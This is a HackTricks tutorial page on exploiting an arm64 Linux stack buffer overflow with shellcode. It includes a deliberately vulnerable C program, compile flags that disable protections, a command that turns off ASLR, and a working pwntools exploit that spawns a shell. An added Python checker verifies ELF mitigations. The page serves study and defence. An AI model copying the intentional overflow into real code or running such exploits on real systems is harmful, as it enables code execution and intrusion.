Stack Shellcode - arm64
tip
Learn and practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn and practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Find an introduction to arm64 in:
Linux
Code
#include <stdio.h>
#include <unistd.h>

void vulnerable_function() {
    char buffer[64];
    read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability: 256 bytes read into a 64-byte buffer
}

int main() {
    vulnerable_function();
    return 0;
}
Compile without PIE, canary and NX:
clang -o bof bof.c -fno-stack-protector -Wno-format-security -no-pie -z execstack
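Each of those three flags leaves a trace in the resulting ELF: `-no-pie` produces an ET_EXEC object instead of ET_DYN, `-z execstack` sets the X bit on the PT_GNU_STACK program header, and `-fno-stack-protector` removes the reference to `__stack_chk_fail`. The following checker is an added example, not part of the original page or of pwntools; it parses those headers directly with the standard library so a defender can verify a binary's mitigations without extra tooling. `build_sample_elf` constructs a minimal header-only ELF64 image as sample input (it is not loadable), and `check_file` is an assumed convenience wrapper for real binaries.

```python
import struct

# ELF64 constants from the ELF specification
ELF_MAGIC = b"\x7fELF"
ET_EXEC, ET_DYN = 2, 3
EM_AARCH64 = 183
PT_GNU_STACK = 0x6474E551
PF_X, PF_W, PF_R = 0x1, 0x2, 0x4


def check_mitigations(elf_bytes: bytes) -> dict:
    """Report which stack-related mitigations an ELF64 image carries.

    pie:    True when e_type is ET_DYN (position independent executable).
    nx:     True when a PT_GNU_STACK header exists without the X flag; a
            missing header is reported as nx=False because the loader then
            falls back to an executable stack on most Linux kernels.
    canary: True when the image references __stack_chk_fail, the function
            the compiler calls on a canary mismatch (byte scan, fine for a
            quick triage of a dynamically linked binary).
    """
    if elf_bytes[:4] != ELF_MAGIC or elf_bytes[4] != 2:  # EI_CLASS 2 = ELF64
        raise ValueError("not an ELF64 image")
    end = "<" if elf_bytes[5] == 1 else ">"  # EI_DATA 1 = little endian
    # Header fields after e_ident: e_type, e_machine, e_version, e_entry,
    # e_phoff, e_shoff, e_flags, e_ehsize, e_phentsize, e_phnum
    (e_type, e_machine, _, _, e_phoff, _, _, _,
     e_phentsize, e_phnum) = struct.unpack_from(end + "HHIQQQIHHH", elf_bytes, 16)
    nx = False
    for i in range(e_phnum):
        # Each program header starts with p_type and p_flags
        p_type, p_flags = struct.unpack_from(end + "II", elf_bytes, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)
    return {
        "arch_arm64": e_machine == EM_AARCH64,
        "pie": e_type == ET_DYN,
        "nx": nx,
        "canary": b"__stack_chk_fail" in elf_bytes,
    }


def check_file(path: str) -> dict:
    """Assumed helper: run the check on a binary on disk, e.g. check_file('./bof')."""
    with open(path, "rb") as f:
        return check_mitigations(f.read())


def build_sample_elf(exec_stack: bool, pie: bool, canary: bool) -> bytes:
    """Constructed sample: a minimal little-endian aarch64 ELF64 header plus a
    single PT_GNU_STACK program header. Enough for check_mitigations; not a
    program that can actually be loaded."""
    e_ident = ELF_MAGIC + bytes([2, 1, 1, 0]) + b"\x00" * 8  # class, data, version, OS ABI, pad
    ehdr_size, phdr_size = 64, 56
    header = e_ident + struct.pack(
        "<HHIQQQIHHHHHH",
        ET_DYN if pie else ET_EXEC, EM_AARCH64, 1, 0,
        ehdr_size, 0, 0, ehdr_size, phdr_size, 1, 0, 0, 0,
    )
    flags = PF_R | PF_W | (PF_X if exec_stack else 0)
    phdr = struct.pack("<IIQQQQQQ", PT_GNU_STACK, flags, 0, 0, 0, 0, 0, 16)
    blob = header + phdr
    if canary:
        blob += b"\x00__stack_chk_fail\x00"  # stands in for the dynsym string
    return blob


if __name__ == "__main__":
    # What the clang line on this page produces vs. a default hardened build
    print("no-pie / execstack / no-protector:",
          check_mitigations(build_sample_elf(exec_stack=True, pie=False, canary=False)))
    print("default build:",
          check_mitigations(build_sample_elf(exec_stack=False, pie=True, canary=True)))
```

Run `check_file('./bof')` against the binary produced by the compile line above and all three of `pie`, `nx` and `canary` should come back False; a default clang build returns True for all of them, which is the baseline a deployed binary should meet.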
No ASLR & No canary - Stack Overflow
To disable ASLR run:
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
To find the offset of the bof check this link.
Exploit:
from pwn import *
# Load the binary
binary_name = './bof'
elf = context.binary = ELF(binary_name)
# Generate shellcode
shellcode = asm(shellcraft.sh())
# Start the process
p = process(binary_name)
# Offset to return address
offset = 72
# Address in the stack after the return address
ret_address = p64(0xfffffffff1a0)
# Craft the payload
payload = b'A' * offset + ret_address + shellcode
print("Payload length: "+ str(len(payload)))
# Send the payload
p.send(payload)
# Drop to an interactive session
p.interactive()
The only "difficult" thing to find here is the address in the stack to call. In my case I generated the exploit with the address found using gdb, but then when exploiting it, it didn't work (because the stack address changed a bit). I opened the generated core file (gdb ./bof ./core) and checked the real address of the start of the shellcode.
macOS
tip
It's not possible to disable NX on macOS because on arm64 this mode is enforced at the hardware level, so you won't be able to turn it off; therefore you won't find examples with shellcode in the stack on macOS.
Check the macOS ret2win example in: